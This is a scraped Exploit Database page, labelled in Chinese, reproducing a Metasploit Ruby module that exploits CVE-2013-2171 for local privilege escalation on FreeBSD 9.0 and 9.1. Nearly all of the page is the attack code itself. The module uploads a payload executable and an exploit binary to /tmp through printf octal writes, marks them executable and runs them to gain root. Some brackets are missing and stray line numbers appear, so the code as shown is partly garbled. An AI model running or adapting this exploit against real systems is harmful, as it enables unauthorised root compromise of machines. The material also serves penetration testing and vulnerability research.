FreeBSD 9 – Address Space Manipulation Privilege Escalation (Metasploit)

Exploit Database
105 阅读

作者： Metasploit

日期： 2013-06-26
类别：
- local
平台：
- freebsd
来源：https://www.exploit-db.com/exploits/26454/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

# http://metasploit.com/

require 'msf/core'

class Metasploit4 < Msf::Exploit::Local

Rank = GreatRanking

include Msf::Exploit::EXE

include Msf::Post::Common

include Msf::Post::File

include Msf::Exploit::FileDropper

def initialize(info={})

super( update_info( info, {

'Name'=> 'FreeBSD 9 Address Space Manipulation Privilege Escalation',

'Description' => %q{

This module exploits a vulnerability that can be used to modify portions of

a process's address space, which may lead to privilege escalation.Systems

such as FreeBSD 9.0 and 9.1 are known to be vulnerable.

'License' => MSF_LICENSE,

'Author'=>

[

'Konstantin Belousov', # Discovery

'Alan Cox',# Discovery

'Hunger',# POC

'sinn3r' # Metasploit

'Platform'=> [ 'bsd' ],

'Arch'=> [ ARCH_X86 ],

'SessionTypes'=> [ 'shell' ],

'References'=>

[

[ 'CVE', '2013-2171' ],

[ 'OSVDB', '94414' ],

[ 'EDB', '26368' ],

[ 'BID', '60615' ],

[ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]

'Targets' =>

[

[ 'FreeBSD x86', {} ]

'DefaultTarget' => 0,

'DisclosureDate' => "Jun 18 2013",

}

))

register_options([

# It isn't OptPath becuase it's a *remote* path

OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),

], self.class)

end

def check

res = session.shell_command_token("uname -a")

return Exploit::CheckCode::Appears if res =~ /FreeBSD 9\.[01]/

Exploit::CheckCode::Safe

end

def write_file(fname, data)

oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"

session.shell_command_token("printf \"#{oct_data}\" > #{fname}")

session.shell_command_token("chmod +x #{fname}")

chk = session.shell_command_token("file #{fname}")

return (chk =~ /ERROR: cannot open/) ? false : true

end

def upload_payload

fname = datastore['WritableDir']

fname = "#{fname}/" unless fname =~ %r'/$'

if fname.length > 36

fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")

end

fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"

p = generate_payload_exe

f = write_file(fname, p)

return nil if not f

fname

end

def generate_exploit(payload_fname)

# Metasm does not support FreeBSD executable generation.

path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")

x = File.open(path, 'rb') { |f| f.read(f.stat.size) }

x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))

end

def upload_exploit(payload_fname)

fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"

bin = generate_exploit(payload_fname)

f = write_file(fname, bin)

return nil if not f

fname

end

def exploit

payload_fname = upload_payload

fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if payload_fname.nil?

print_status("Payload #{payload_fname} uploaded.")

exploit_fname = upload_exploit(payload_fname)

fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil?

print_status("Exploit #{exploit_fname} uploaded.")

register_files_for_cleanup(payload_fname, exploit_fname)

print_status("Executing #{exploit_fname}")

cmd_exec(exploit_fname)

end